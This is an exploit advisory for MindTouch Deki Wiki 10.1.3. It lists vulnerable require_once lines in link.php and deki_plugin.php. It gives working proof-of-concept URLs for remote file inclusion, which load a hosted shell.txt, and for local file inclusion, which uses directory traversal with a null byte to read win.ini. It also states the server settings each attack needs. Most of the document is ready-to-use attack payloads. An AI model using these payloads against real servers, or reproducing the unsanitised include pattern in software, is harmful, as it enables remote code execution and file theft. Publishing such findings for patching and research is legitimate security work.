#################################################### ### Exploit Title: MindTouch Deki Wiki v10.1.3 Multiple Vulnerabilities ### Date: 11/08/2012 ### Author: L0n3ly-H34rT ### Homepage: http://se3c.tk/ ### Contact: l0n3ly_h34rt@hotmail.com ### Software Link: http://garr.dl.sourceforge.net/project/dekiwiki/MindTouch%20Core%20Source/Pipestone%2010.1.3/MindTouch_Core_10.1.3_Source.tar.gz ### Tested on: Linux/Windows ### Version : 10.1.3 ( I don't check old version & may be affected ! ) #################################################### # Multiple Remote File Inclusion : 1- File ( deki/gui/link.php ) in lines 27 & 28 : require_once($IP . '/includes/Defines.php'); require_once($IP . '/includes/Setup.php'); - P.O.C : http://127.0.0.1/deki/web/deki/gui/link.php?IP=http://127.0.0.1/shell.txt? 2- File ( deki/plugins/deki_plugin.php ) in lines 486 , 487 & 488 : require_once($IP . $wgDekiPluginPath . '/' . 'deki_plugin_view.php'); require_once($IP . $wgDekiPluginPath . '/' . 'special_page_plugin.php'); require_once($IP . $wgDekiPluginPath . '/' . 'special_mvc_plugin.php'); - P.O.C : http://127.0.0.1/deki/web/deki/plugins/deki_plugin.php?IP=http://127.0.0.1/shell.txt? http://127.0.0.1/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=http://127.0.0.1/shell.txt? ----------------------------------------------------------------------------- # Multiple Local File Inclusion : - P.O.C : http://127.0.0.1/deki/web/deki/gui/link.php?IP=../../../../../../../../../windows/win.ini%00 http://127.0.0.1/deki/web/deki/plugins/deki_plugin.php?IP=../../../../../../../../../windows/win.ini%00 http://127.0.0.1/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=../../../../../../../../../windows/win.ini%00 # Notes : - For Remote File Inclusion Must Be allow_url_include=On - For Local File Inclusion Must Be magic_quotes_gpc = Off # Greetz to my friendz